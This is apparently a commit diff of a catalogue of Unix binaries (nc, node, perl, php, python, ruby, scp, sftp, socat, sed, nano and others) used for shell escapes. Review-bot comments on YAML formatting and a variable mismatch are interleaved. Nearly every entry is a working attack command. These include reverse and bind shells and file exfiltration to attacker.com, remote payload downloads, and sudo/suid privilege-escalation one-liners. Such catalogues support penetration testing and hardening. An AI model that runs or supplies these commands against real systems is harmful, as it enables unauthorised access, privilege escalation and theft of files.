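Review bot: The `suid-enabled` value is left as `"./more file_to_read\n"`, a double-quoted scalar with an escaped newline, while the `file-read` entry two lines above it is converted in this same hunk from the quoted-with-line-break form to the plain scalar `more file_to_read`. The two now differ in style and in content: one `code` string ends with a newline and the other does not, so either trailing newlines are significant to whatever renders these values or the escape is dead weight. Changing the line to `- code: ./more file_to_read` would make the hunk internally consistent; if the trailing newline is meaningful, a comment saying so would help.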


@ -1,8 +1,8 @@
--- ---
functions: functions:
sudo-enabled: sudo-enabled:
- description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell. - description: Exploit the fact that `mount` can be executed via `sudo` to *replace* the `mount` binary with a shell.
code: | code: |
sudo mount -o bind /bin/sh /bin/mount sudo mount -o bind /bin/sh /bin/mount
sudo mount sudo mount
--- ---


@ -1,38 +1,36 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
nano -s $TF /etc/hosts nano -s $TF /etc/hosts
^T ^T
file-write: file-write:
- code: | - code: |
nano file_to_write nano file_to_write
^O ^O
file-read: file-read:
- code: 'nano file_to_read - code: nano file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF chmod +x $TF
./nano -s $TF /etc/hosts ./nano -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo nano -s $TF /etc/hosts sudo nano -s $TF /etc/hosts
^T ^T
--- ---


@ -1,29 +1,27 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
nc -e /bin/sh $RHOST $RPORT nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive: bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
nc -l -p $LPORT -e /bin/sh nc -l -p $LPORT -e /bin/sh
upload: upload:
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
on the attacker box to collect the file. code: |
code: | RHOST=attacker.com
RHOST=attacker.com RPORT=12345
RPORT=12345 LFILE=file_to_send
LFILE=file_to_send nc $RHOST $RPORT < "$LFILE"
nc $RHOST $RPORT < "$LFILE"
download: download:
- description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
< "file_to_send"` on the attacker box to send the file. code: |
code: | LPORT=12345
LPORT=12345 LFILE=file_to_save
LFILE=file_to_save nc -l -p $LPORT > "$LFILE"
nc -l -p $LPORT > "$LFILE"
--- ---


@ -1,19 +1,16 @@
--- ---
description: 'The read file content is corrupted by a leading space added to each description: The read file content is corrupted by a leading space added to each line.
line.
'
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
nl -bn -w1 -s '' $LFILE nl -bn -w1 -s '' $LFILE
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./nl -bn -w1 -s '' $LFILE ./nl -bn -w1 -s '' $LFILE
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo nl -bn -w1 -s '' $LFILE sudo nl -bn -w1 -s '' $LFILE
--- ---


@ -1,38 +1,33 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'' - code: |
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh"); node -e 'sh = require("child_process").spawn("/bin/sh");
net.connect(process.env.RPORT, process.env.RHOST, function () { net.connect(process.env.RPORT, process.env.RHOST, function () {
this.pipe(sh.stdin); this.pipe(sh.stdin);
sh.stdout.pipe(this); sh.stdout.pipe(this);
sh.stderr.pipe(this); sh.stderr.pipe(this);
});' });'
bind-shell-interactive: bind-shell-interactive:
- description: Run `nc target.com 12345` on the attacker box to connect to the shell. - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
code: | code: |
export LPORT=12345 export LPORT=12345
node -e 'sh = require("child_process").spawn("/bin/sh"); node -e 'sh = require("child_process").spawn("/bin/sh");
require("net").createServer(function (client) { require("net").createServer(function (client) {
client.pipe(sh.stdin); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
}).listen(process.env.LPORT);' }).listen(process.env.LPORT);'
suid-enabled: suid-enabled:
- code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, - code: |
1, 2]});'' ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
'
sudo-enabled: sudo-enabled:
- code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, - code: |
2]});'' sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
'
--- ---


@ -1,18 +1,16 @@
--- ---
description: | description: Three spaces are added before each character in the read file, and non-printable chars are printed as backslash escape sequences.
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
functions: functions:
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
od -An -c -w9999 "$LFILE" od -An -c -w9999 "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./od -An -c -w9999 "$LFILE" ./od -An -c -w9999 "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sudo od -An -c -w9999 "$LFILE" sudo od -An -c -w9999 "$LFILE"
--- ---


@ -1,15 +1,15 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: perl -e 'exec "/bin/sh";' - code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
suid-enabled: suid-enabled:
- code: ./perl -e 'exec "/bin/sh";' - code: ./perl -e 'exec "/bin/sh";'
sudo-enabled: sudo-enabled:
- code: sudo perl -e 'exec "/bin/sh";' - code: sudo perl -e 'exec "/bin/sh";'
--- ---


@ -1,50 +1,49 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'system(getenv("CMD"));' php -r 'system(getenv("CMD"));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));' php -r 'passthru(getenv("CMD"));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));' php -r 'print(shell_exec(getenv("CMD")));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));' php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
- code: | - code: |
export CMD="/bin/sh" export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }' php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive: execute-non-interactive:
- code: | - code: |
export CMD="id" export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}' php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
PHP version 5.4 or later. code: |
code: | LHOST=0.0.0.0
LHOST=0.0.0.0 LPORT=8888
LPORT=8888 php -S $LHOST:$LPORT
php -S $LHOST:$LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);' php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled: suid-enabled:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
./php -r "system('$CMD');" ./php -r "system('$CMD');"
sudo-enabled: sudo-enabled:
- code: | - code: |
CMD="/bin/sh" CMD="/bin/sh"
sudo php -r "system('$CMD');" sudo php -r "system('$CMD');"
--- ---


@ -1,38 +1,36 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
pico -s $TF /etc/hosts pico -s $TF /etc/hosts
^T ^T
file-write: file-write:
- code: | - code: |
pico file_to_write pico file_to_write
^O ^O
file-read: file-read:
- code: 'pico file_to_read - code: pico file_to_read
'
suid-enabled: suid-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo $'#!/bin/sh -p\n'"$COMMAND" > $TF echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
chmod +x $TF chmod +x $TF
./pico -s $TF /etc/hosts ./pico -s $TF /etc/hosts
^T ^T
sudo-enabled: sudo-enabled:
- description: After running this exit the editor to see the command output. - description: After running this exit the editor to see the command output.
code: | code: |
COMMAND=id COMMAND=id
TF=$(mktemp) TF=$(mktemp)
echo "$COMMAND" > $TF echo "$COMMAND" > $TF
chmod +x $TF chmod +x $TF
sudo pico -s $TF /etc/hosts sudo pico -s $TF /etc/hosts
^T ^T
--- ---


@ -1,24 +1,23 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- description: The executed command output shown in the puppet log format. - description: The executed command output shown in the puppet log format.
code: | code: |
export CMD="/usr/bin/id" export CMD="/usr/bin/id"
puppet apply -e "exec { '$CMD': logoutput => true }" puppet apply -e "exec { '$CMD': logoutput => true }"
file-write: file-write:
- description: The file path must be absolute. - description: The file path must be absolute.
code: | code: |
export LFILE="/tmp/file_to_write" export LFILE="/tmp/file_to_write"
puppet apply -e "file { '$LFILE': content => 'data' }" puppet apply -e "file { '$LFILE': content => 'data' }"
file-read: file-read:
- description: The read file content is corrupted by the `diff` output format. The - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
actual `/usr/bin/diff` command is executed. code: |
code: | export LFILE=file_to_read
export LFILE=file_to_read puppet filebucket -l diff /dev/null $LFILE
puppet filebucket -l diff /dev/null $LFILE
sudo-enabled: sudo-enabled:
- description: The executed command output shown in the puppet log format. - description: The executed command output shown in the puppet log format.
code: | code: |
export CMD="/usr/bin/id" export CMD="/usr/bin/id"
sudo puppet apply -e "exec { '$CMD': logoutput => true }" sudo puppet apply -e "exec { '$CMD': logoutput => true }"
--- ---


@ -1,39 +1,37 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")' - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file. code: |
code: | export URL=http://attacker.com/
export URL=http://attacker.com/ export LFILE=file_to_send
export LFILE=file_to_send python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))' - description: Serve files in the local folder running an HTTP server.
- description: Serve files in the local folder running an HTTP server. code: |
code: | export LPORT=8888
export LPORT=8888 python2 -m SimpleHTTPServer $LPORT
python2 -m SimpleHTTPServer $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])' python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
file-write: file-write:
- code: python2 -c 'open("file_to_write","w+").write("data")' - code: python2 -c 'open("file_to_write","w+").write("data")'
file-read: file-read:
- code: python2 -c 'open("file_to_read").read()' - code: python2 -c 'open("file_to_read").read()'
load-library: load-library:
- code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled: suid-enabled:
- code: ./python2 -c 'import os; os.system("/bin/sh -p")' - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled: sudo-enabled:
- code: sudo python2 -c 'import os; os.system("/bin/sh")' - code: sudo python2 -c 'import os; os.system("/bin/sh")'
--- ---


@ -1,39 +1,37 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")' - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell. code: |
code: | export RHOST=attacker.com
export RHOST=attacker.com export RPORT=12345
export RPORT=12345 python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
upload: upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
HTTP service on the attacker box to collect the file. code: |
code: | export URL=http://attacker.com/
export URL=http://attacker.com/ export LFILE=file_to_send
export LFILE=file_to_send python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))' - description: Serve files in the local folder running an HTTP server.
- description: Serve files in the local folder running an HTTP server. code: |
code: | LPORT=8888
LPORT=8888 python3 -m http.server $LPORT
python3 -m http.server $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export URL=http://attacker.com/file_to_get export URL=http://attacker.com/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])' python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
file-write: file-write:
- code: python3 -c 'open("file_to_write","w+").write("data")' - code: python3 -c 'open("file_to_write","w+").write("data")'
file-read: file-read:
- code: python3 -c 'open("file_to_read").read()' - code: python3 -c 'open("file_to_read").read()'
load-library: load-library:
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled: suid-enabled:
- code: ./python3 -c 'import os; os.system("/bin/sh -p")' - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
sudo-enabled: sudo-enabled:
- code: sudo python3 -c 'import os; os.system("/bin/sh")' - code: sudo python3 -c 'import os; os.system("/bin/sh")'
--- ---


@ -1,15 +1,14 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: rlwrap /bin/sh - code: rlwrap /bin/sh
file-write: file-write:
- description: This adds timestamps to the output file. This relies on the external - description: This adds timestamps to the output file. This relies on the external `echo` command.
`echo` command. code: |
code: | LFILE=file_to_write
LFILE=file_to_write rlwrap -l "$LFILE" echo data
rlwrap -l "$LFILE" echo data
suid-enabled: suid-enabled:
- code: "./rlwrap -H /dev/null /bin/sh -p" - code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo rlwrap /bin/sh - code: sudo rlwrap /bin/sh
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid-enabled:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo-enabled:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled: suid-enabled:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}' - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled: sudo-enabled:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}' - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
--- ---


@ -1,33 +1,32 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: ruby -e 'exec "/bin/sh"' - code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell. - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload: upload:
- description: Serve files in the local folder running an HTTP server. This requires - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
version 1.9.2 or later. code: |
code: | export LPORT=8888
export LPORT=8888 ruby -run -e httpd . -p $LPORT
ruby -run -e httpd . -p $LPORT
download: download:
- description: Fetch a remote file via HTTP GET request. - description: Fetch a remote file via HTTP GET request.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345
export RFILE=/file_to_get export RFILE=/file_to_get
export LFILE=file_to_save export LFILE=file_to_save
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }' ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
file-write: file-write:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
file-read: file-read:
- code: ruby -e 'puts File.read("file_to_read")' - code: ruby -e 'puts File.read("file_to_read")'
load-library: load-library:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled: sudo-enabled:
- code: sudo ruby -e 'exec "/bin/sh"' - code: sudo ruby -e 'exec "/bin/sh"'
--- ---


@ -1,36 +1,36 @@
--- ---
functions: functions:
execute-non-interactive: execute-non-interactive:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
CMD="id" CMD="id"
echo "$CMD" > "$TF" echo "$CMD" > "$TF"
chmod +x "$TF" chmod +x "$TF"
scp -S $TF x y: scp -S $TF x y:
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_save RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send LPATH=file_to_send
scp $LFILE $RPATH scp $LFILE $RPATH
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RPATH=user@attacker.com:~/file_to_get RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save LFILE=file_to_save
scp $RPATH $LFILE scp $RPATH $LFILE
sudo-enabled: sudo-enabled:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
CMD="id" CMD="id"
echo "$CMD" > "$TF" echo "$CMD" > "$TF"
chmod +x "$TF" chmod +x "$TF"
sudo scp -S $TF x y: sudo scp -S $TF x y:
suid-limited: suid-limited:
- code: | - code: |
TF=$(mktemp) TF=$(mktemp)
CMD="id" CMD="id"
echo "$CMD" > "$TF" echo "$CMD" > "$TF"
chmod +x "$TF" chmod +x "$TF"
./scp -S $TF a b: ./scp -S $TF a b:
--- ---
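Review bot: The `upload` entry's command `scp $LFILE $RPATH` references `$LFILE`, but the variable assigned two lines above it is `LPATH=file_to_send`, so `$LFILE` is empty and the command as written does not name the local file; the commit reformats this section but leaves the mismatch in place. The `download` entry in the same file, and the upload entries in the other files touched by this commit, use `LFILE` for the local path, so the smallest consistent fix is changing the assignment to `LFILE=file_to_send`. Alternatively change the command to `scp $LPATH $RPATH` if the `LPATH` naming is intended here.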


@ -1,24 +1,24 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts code: sed -n "1e bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
execute-non-interactive: execute-non-interactive:
- description: GNU version only. - description: GNU version only.
code: sed -n "1e id" /etc/hosts code: sed -n "1e id" /etc/hosts
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sed -n "1s/.*/data/w $LFILE" /etc/hosts sed -n "1s/.*/data/w $LFILE" /etc/hosts
file-read: file-read:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
sed '' "$LFILE" sed '' "$LFILE"
suid-enabled: suid-enabled:
- code: | - code: |
LFILE=file_to_read LFILE=file_to_read
./sed -e '' "$LFILE" ./sed -e '' "$LFILE"
sudo-enabled: sudo-enabled:
- description: GNU version only. Also, this requires `bash`. - description: GNU version only. Also, this requires `bash`.
code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts code: sudo sed -n "1e /bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" /etc/hosts
--- ---


@ -1,9 +1,9 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: setarch $(arch) /bin/sh - code: setarch $(arch) /bin/sh
suid-enabled: suid-enabled:
- code: "./setarch $(arch) /bin/sh -p" - code: ./setarch $(arch) /bin/sh -p
sudo-enabled: sudo-enabled:
- code: sudo setarch $(arch) /bin/sh - code: sudo setarch $(arch) /bin/sh
--- ---


@ -1,25 +1,25 @@
--- ---
functions: functions:
execute-interactive: execute-interactive:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sftp $HOST sftp $HOST
!/bin/sh !/bin/sh
upload: upload:
- description: Send local file to a SSH server. - description: Send local file to a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
put file_to_send file_to_save put file_to_send file_to_save
download: download:
- description: Fetch a remote file from a SSH server. - description: Fetch a remote file from a SSH server.
code: | code: |
RHOST=user@attacker.com RHOST=user@attacker.com
sftp $RHOST sftp $RHOST
get file_to_get file_to_save get file_to_get file_to_save
sudo-enabled: sudo-enabled:
- code: | - code: |
HOST=user@attacker.com HOST=user@attacker.com
sudo sftp $HOST sudo sftp $HOST
!/bin/sh !/bin/sh
--- ---


@ -2,16 +2,16 @@
description: The read file content is corrupted by adding a newline. description: The read file content is corrupted by adding a newline.
functions: functions:
file-write: file-write:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
shuf -e data -o "$LFILE" shuf -e data -o "$LFILE"
suid-enabled: suid-enabled:
- description: - description:
code: | code: |
LFILE=file_to_write LFILE=file_to_write
./shuf -e data -o "$LFILE" ./shuf -e data -o "$LFILE"
sudo-enabled: sudo-enabled:
- code: | - code: |
LFILE=file_to_write LFILE=file_to_write
sudo shuf -e data -o "$LFILE" sudo shuf -e data -o "$LFILE"
--- ---
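Review bot: The `suid-enabled` entry carries a bare `- description:` key with no value, which YAML parses as null and the site will presumably render as an empty description; the reformat keeps it as-is. Either drop that line so the entry matches the `file-write` and `sudo-enabled` siblings, or give it real text. Separately, the file-level description at the top of the hunk talks about "read file content" while every function listed here is a file-write, so that sentence may be worth rechecking against the intended behaviour.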


@ -1,16 +1,14 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on - description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
the attacker box to receive the shell. code: |
code: | RHOST=attacker.com
RHOST=attacker.com RPORT=12345
RPORT=12345 socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
